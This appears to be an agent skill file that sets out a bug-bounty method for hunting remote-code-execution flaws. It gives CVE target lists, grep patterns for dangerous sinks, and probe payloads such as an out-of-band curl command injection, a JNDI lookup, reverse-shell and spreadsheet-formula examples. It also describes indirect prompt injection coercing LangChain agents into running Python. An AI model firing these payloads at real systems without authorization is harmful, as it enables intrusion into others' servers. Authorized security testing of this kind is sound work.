- name
- hunt-rce
- description
- Hunting skill for remote code execution. Built from 1,218 public RCE bug bounty reports across HackerOne, Project Zero, Intigriti,
- sources
- hackerone_public, github_advisories, github_deep, project_zero, intigriti, devcore_blog, watchtowr, orca_security, microsoft_msrc, securitylab_github, nvd_verified
- report_count
- 1218
- generated_at
- 2026-05-04T00:00:00.000Z
## Crown Jewel Targets
RCE is the highest-paying class in bug bounty, and the 24-month meta has shifted decisively toward five asset types. All CVEs below are verified against NVD.
**1. Modern JS framework deserialization (CVSS 10.0).** React Server Components / React Server Functions / Next.js App Router. **CVE-2025-55182** (CVSS 10.0, Meta Bug Bounty, Vercel WAF-bypass program on H1, exploited in the wild within 24 hours of disclosure) is the defining 2025-2026 RCE. Every Next.js >=14.3.0-canary.77 / >=15.x / >=16.x deployment running unpatched RSC is a one-request RCE target. Vercel maintains a *separate* H1 program paying low five-figure bounties for WAF bypasses against this CVE. Hunt this *first* on any modern JS stack.
**2. CI/CD runners and GitOps controllers.** GitHub Actions `pull_request_target` script injection, GitLab CI runner takeover, Jenkins script console, Tekton/ArgoCD/Flux git resolvers. **CVE-2026-40938** (Tekton git resolver `--upload-pack` argument injection — CVSS 9.4, NVD-verified, fix in v1.11.1) and **CVE-2026-24685** (OpenProject git argument injection in repository diff endpoint, CVSS 9.4) define the 2026 GitOps meta. CI compromise = supply-chain compromise; bounties scale accordingly. GitHub Security Lab pays for these directly; downstream programs (Cilium, ArgoCD, Tekton are all CNCF graduates) often have parallel bounty programs.
**3. Container runtimes and admission controllers.** **CVE-2024-21626** (runc "Leaky Vessels" — CISA KEV, CVSS 8.6, Snyk Labs disclosure) gives you full host RCE from any pod with `runc exec`. **CVE-2024-23653** (BuildKit GRPC SecurityMode missing privilege check) breaks out at build time. **CVE-2024-0132** (NVIDIA Container Toolkit TOCTOU, Wiz Research) covers the GPU-rich infrastructure stack. **CVE-2025-1974** (ingress-nginx admission controller RCE, CVSS 9.8) — any pod-network attacker reads cluster-wide Secrets. Hunt these on every Kubernetes target where you can deploy a pod.
**4. ML serving / inference platforms.** **CVE-2025-27520** (BentoML `deserialize_value()` unsafe pickle on `/summarize`, CVSS 9.8 critical, c2an1 disclosure via Snyk) and **CVE-2025-32375** (BentoML runner server, GHSA-7v4r-c989-xh26) demonstrate the universal pattern — model registries deserialize pickled tensors and trust the format. **CVE-2024-2912** (BentoML earlier pickle, Toreon disclosure). **CVE-2024-1560/1483/1594** (MLflow path traversal family, all via Huntr) reach arbitrary file read/write on the model server. Hunt model registry endpoints, inference servers, and `Content-Type: application/vnd.*+pickle` accepting handlers.
**5. Agentic LLM tool-use.** **CVE-2025-68613** (LangChain `langchain-experimental` PythonREPLTool / PandasDataFrameAgent — CVSS 9.8 critical, "Semantic RCE") is the new attack class. Indirect prompt injection in CSV/text/RAG context coerces the agent into writing exec()-able Python. Same pattern hits LlamaIndex code interpreter, MCP servers with shell tools, Ollama plugins. The agent is the gadget chain.
**6. Internet Bug Bounty / OSS supply chain.** `nodejs`, `curl`, `git`, `python`, `php`, `rails`, `marked`, `phpoffice/phpspreadsheet`, `GitPython`, `coredns`, `jackson-databind`, `log4j`, `snakeyaml`. A single bug here cascades downstream into thousands of apps. The 2026 corpus shows curl alone with multiple critical/high RCEs (`--engine` arbitrary library load via H1 disclosed report, short-flag grouping argument injection, SFTP QUOTE path traversal, libcurl cookie buffer overflow). Bounties scale with downstream blast radius.
**7. Government & enterprise asset surfaces (deptofdefense pattern).** Old log4j, Confluence (CVE-2023-22527 OGNL injection at `/template/aui/text-inline.vm`), Liferay (CVE-2020-7961), Pentaho with default creds, Cisco IOS XE, GlobalProtect (still paying via H1 disclosed 2025-2026) — all *still paying* on intranets and forgotten subdomains. Old CVEs against old assets is a paying strategy. Apache Tomcat **CVE-2024-50379** (write-enabled default servlet RCE via JSP race condition, CVSS 9.8) joined the rotation in 2024-2025.
**Admin panels with file/asset upload.** Anywhere ops staff upload images, configs, themes, packages. Screenshot URLs piped to shell, ZIP extraction without extension filter, theme installer running `unzip` then serving the public dir. Grav SSTI/direct-install (multiple Snyk advisories), WPML Twig SSTI (Patchstack disclosure).
**OAuth/SSO auth surfaces in OSS apps** — SAML signature validation that returns errors instead of throwing (Admidio H1 disclosed), TSIG bypass on gRPC/QUIC (CoreDNS GHSA), null-password fallback in OIDC (Note Mark GHSA). Not RCE alone, but the way INTO admin where RCE lives. Always-paired hunting target.
**File processors / parsers** — XLSX, XML, image (ExifTool), PDF, font parsers, archive extractors, anything that takes a file and runs code based on its content. Modern incidents hit phpspreadsheet, marked, ExifTool stdin injection, WinRAR (CVE-2025-8088 NTFS ADS path traversal, ESET disclosure).
**What pays the most:** pre-auth, no user interaction, single request. A single `curl http://target/?x=$(payload)` returning a reverse shell is a low-to-mid five-figure bug depending on program. CVE-2025-55182 (React2Shell) paid up to mid five-figure tier publicly via Vercel's dedicated H1 WAF-bypass program. Post-auth/admin RCE is mid-tier (low four to low five-figure). Argument-injection-on-internal-asset is mid-tier. Cluster takeover via GitOps controller is top-tier (high four-figure to mid five-figure on CNCF programs).
## Attack Surface Signals
Greppable signals that this surface might exist:
```bash
# Java deserialization sinks
rg -n "ObjectInputStream|readObject\(|XStream\.fromXML|Jackson.*enableDefaultTyping|SnakeYaml\(\)|new Yaml\(\)\.load\(|HessianInput|Kryo\(\)" \
--type java
# Python pickle / yaml.load sinks
rg -n "pickle\.loads?\(|yaml\.load\(|marshal\.loads\(|cPickle|jsonpickle\.decode" --type py
# PHP unserialize / phar
rg -n "\bunserialize\(|file_exists.*phar://|fopen.*phar://|file_get_contents.*phar://" --type php
# .NET deserialization
rg -n "BinaryFormatter|LosFormatter|ObjectStateFormatter|JavaScriptSerializer.*Deserialize|XmlSerializer.*Deserialize" \
--type cs
# Ruby YAML.load / Marshal.load (not safe_load)
rg -n "YAML\.load\(|YAML\.unsafe_load|Marshal\.(load|restore)" --type rb
# Node.js prototype pollution sinks (gadget reachability)
rg -n '_\.merge\(|_\.mergeWith\(|_\.defaultsDeep\(|Object\.assign\(\{\},' --type js
# Template injection sinks (SSTI)
rg -n "render_template_string|Jinja2.*from_string|Twig.*createTemplate|new Velocity|FreeMarker.*Template|new Handlebars\.SafeString|Pebble" \
-g '!*test*'
# Shell execution from user input
rg -n "subprocess\.call\([^)]*shell=True|subprocess\.run\([^)]*shell=True|os\.system\(|exec\(|eval\(|popen\(|child_process\.exec\(" \
--type py --type js --type rb --type php
# Argument injection — flags reaching CLIs
rg -n 'subprocess.*\["(curl|git|ssh|tar|exiftool|imagemagick|ffmpeg|wget|rsync|scp)"' \
--type py --type js --type rb
# React Server Components / Next.js Flight (CVE-2025-55182 candidates)
rg -n "react-server-dom-(webpack|parcel|turbopack)" -g 'package*.json'
# Pickle accepting Content-Type (BentoML / ML serving family)
rg -n 'application/vnd\..*\+pickle|application/x-python-pickle|pickle\.loads\(.*request' --type py
# Agentic LLM exec sinks (CVE-2025-68613 family)
rg -n 'PythonREPLTool|PythonAstREPLTool|PandasDataFrameAgent|create_pandas_dataframe_agent|sympy\.sympify|VectorSQLDatabaseChain' --type py
```
HTTP-level signals on a live target:
- `Server: Apache Coyote`, `X-Powered-By: JSF/2`, `?vid=`, viewstate/JSF endpoints → **deserialization candidate**
- `X-Generator: Liferay`, `/c/portal/json_service`, `/api/jsonws/` → **Liferay (CVE-2020-7961)**
- `X-Confluence-Request-Time` header, `/exception.jsp` exposed, `/template/aui/text-inline.vm` reachable → **Confluence (CVE-2023-22527 OGNL injection)**
- `Set-Cookie: .ASPXAUTH=`, `__VIEWSTATE` in body → **.NET deserialization**
- `User-Agent: ${jndi:...}` reflected anywhere in logs/admin UI → **log4j (CVE-2021-44228) candidate**
- `ext-js`, Sitecore footprint, `/sitecore/admin/` → **Sitecore deserialization (CVE-2025-27218, H1 disclosed)**
- `Powered by DotNetNuke`, `.aspx` w/ DNN cookies → **DNN cookie deserialization (CVE-2017-9822, H1 disclosed 2024 against MTN)**
- `Content-Type: application/octet-stream` upload responses + theme/plugin endpoints → **upload chain**
- 500 errors that leak `freemarker.core.InvalidReferenceException`, `Twig\Error`, `jinja2.exceptions.UndefinedError` → **SSTI confirmed**
- `next/static/`, `_next/data/`, `__nextjs`, `X-Powered-By: Next.js`, plus `Server-Action` request headers → **CVE-2025-55182 candidate** — pivot to Server Function endpoint discovery
- `X-Php-Cgi`, `cgi-bin/php-cgi.exe`, `.php?` on Windows hosts in CN/JP/TW locales → **CVE-2024-4577 PHP-CGI argument injection (Best-Fit encoding)**
- `Server: Apache/2.4.5x` plus `mod_proxy` headers → **Apache Confusion Attacks (CVE-2024-38472/38476/38477/39573, Orange Tsai BHUSA 2024)**
- `Server: Apache-Coyote/1.1` + Tomcat default servlet error pages + 9.0.x version → **CVE-2024-50379 default-servlet write-RCE** (NVD-verified critical)
- `Vercel Platform: ` response header (without correct version pinning) → **CVE-2025-55182 + Vercel WAF-bypass H1 program**
- `Content-Type: application/vnd.bentoml+pickle` accepted on `/summarize` or model-inference endpoints → **CVE-2025-27520 BentoML unsafe pickle**
- `X-LangChain-Agent` / `X-LangServe-` headers, or `/invoke` / `/agent` endpoints with CSV/text upload → **CVE-2025-68613 LangChain REPL semantic RCE**
- `kubernetes.io/ingress.class: nginx` + admission webhook reachable from pod network → **CVE-2025-1974 ingress-nginx**
`docker pull <image> && trivy image <image>` and `nuclei -t cves/` against fingerprinted versions remains the highest-throughput high-paying technique on enterprise/DoD assets.
## Insertion Point Taxonomy
Every place attacker-controlled data flows for RCE. Use as a checklist on each target:
- **URL path / query / fragment** → SSTI (`/page?name={{7*7}}`), command injection (`/api/ping?host=`), PHP-CGI argument injection (`/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1`).
- **Headers** — `User-Agent`, `Referer`, `X-Forwarded-For`, `Authorization`, custom `X-Tenant-ID`. Log4j JNDI lives here. CRLF in `httplib.HTTPConnection` (Orange Tsai's GitHub Enterprise chain). Server Function action headers in React. BentoML `Payload-Container`/`Payload-Meta` headers carry pickle (CVE-2025-32375 GHSA-7v4r-c989-xh26).
- **Body** — JSON (deserialization metadata: `__type`, `$type`, `class`, `_class`), form fields, multipart, XML (XXE → file read → secret → RCE), GraphQL variables, RSC Flight payloads, raw pickle bytes on `application/vnd.*+pickle`.
- **Cookies** — Java/Ruby session marshalled object (rO0A magic for Java b64), `__VIEWSTATE`, JWT alg=none then JWT-claim SSTI, custom session tokens that base64-decode to serialized objects.
- **File contents** — filename (path traversal → arbitrary write → RCE), ZIP entries (theme installer, package manager), EXIF/XMP/IPTC metadata (ExifTool ImageMagick), color profile, font tables, CSV cells (`=cmd|"/c calc"!A1` for spreadsheet apps; CSV cells fed to LangChain `PandasDataFrameAgent` for CVE-2025-68613), YAML uploads (`!!python/object/apply:os.system`), SVG (XSS → admin → RCE), Markdown (SSTI in render pipeline), pickled tensors (BentoML).
- **WebSocket frames** — RCE via JSON deserialization in WS message handlers, often missed by HTTP-only WAF.
- **Background/async paths** — job queues, webhooks retry, cron-triggered processing, email-to-ticket parsers, scheduled report generators that interpolate user names into shell.
- **Indirect (stored)** — DB-stored content rendered later, file written then served, prompt context for LLMs (LLM tool use → shell exec gadget — exact CVE-2025-68613 vector via RAG), git commit messages echoed by CI, branch names interpolated into `run:` blocks of GitHub Actions.
- **CLI/IPC parameters** — Kubernetes ResolutionRequest objects (Tekton CVE-2026-40938 NVD-verified), Argo CMP plugin env vars, kubectl exec annotations, container labels.
- **Container build context** — Dockerfile `WORKDIR` symlink to `/proc/self/fd/7/` (CVE-2024-21626 Leaky Vessels), `# syntax=` line referencing untrusted frontend image (CVE-2024-23653 BuildKit), CDI device specs (CVE-2024-0132 NVIDIA Container Toolkit TOCTOU).
- **Protocol smuggling** — Gopher protocol via SSRF (`gopher://target:6379/_FLUSHALL%0d%0a...`), CRLF into Memcached/Redis (Orange Tsai GitHub Enterprise pattern, also H1 2025 disclosed Gopher CRLF report).
For each surface, send `${7*7}`, `{{7*7}}`, `<%=7*7%>`, `${jndi:dns://x.oast.fun/}`, `;curl http://x.oast.fun/`, and a Java deser magic byte (`rO0AB...`) probe. Watch for both reflected math results AND OOB DNS hits.
## Step-by-Step Hunting Methodology
1. **Fingerprint stack first.** Hit `/`, the login page, `/.well-known/`, `/robots.txt`, an error path. Record `Server`, `X-Powered-By`, generator meta, JS framework version (`React.version`, `__NEXT_DATA__`, Vue devtools probe), error templates, cookie names, response timing. RCE hunting without stack knowledge is throwing payloads at walls. **If Next.js >=14.3.0-canary.77 or unpatched 15.x/16.x → start with CVE-2025-55182.**
2. **Check CVE-2025-55182 first on any modern JS target.** The 2025-2026 meta. Probe Server Function endpoints with both `Next-Action` header (Server Actions) and direct RSC Flight POST. Confirm with arithmetic-result reflection or OOB DNS, then submit *immediately* — Vercel pays low-to-mid five-figure for WAF bypasses on patched-but-protected hosts via dedicated H1 program. Patch versions to compare against: React 19.0.1, 19.1.2, 19.2.1; Next.js 15.0.5/15.1.9/15.2.6/15.3.6/15.4.8/15.5.7/16.0.7. Anything below = vuln per NVD CVE-2025-55182 advisory.
3. **Try every known CVE that matches the stack.** This sounds dumb. It pays consistently in 2025-2026. Pull the CVE list with `nuclei -t cves/` or `nmap --script vulners`. The DoD pipeline is essentially "scan asset → match CVE → exploit". **Confluence CVE-2023-22527** (`POST /template/aui/text-inline.vm` with the OGNL `findValue` payload), **PHP-CGI CVE-2024-4577** (Windows in CN/JP/TW locale, `%AD` soft hyphen for argument injection), **Apache CVE-2024-38472/38476** (Orange Tsai Confusion Attacks), **Tomcat CVE-2024-50379** (write-enabled default servlet on case-insensitive FS), **log4j on internal portals** — all still paying.
View on GitHub